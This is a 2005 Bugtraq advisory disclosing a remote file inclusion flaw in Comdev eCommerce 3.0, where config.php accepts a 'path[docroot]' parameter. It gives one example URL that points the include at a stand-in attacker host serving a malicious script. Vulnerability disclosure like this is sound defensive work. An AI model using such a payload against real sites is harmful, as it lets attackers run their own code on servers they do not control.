[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Comdev eCommerce config.php Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Comdev eCommerce config.php Vulnerability
- From: none@xxxxxxxx
- Date: 5 Aug 2005 01:57:08 -0000
Class: Input Validation Error
Vulnerable: Comdev Comdev eCommerce 3.0
The config.php script can be passed a "path[docroot]" http request parameter to
change the location of an included file.
Example:
http://www.vulnerable.com/oneadmin/config.php?path[docroot]=http://www.hacker.com/badscript.php.txt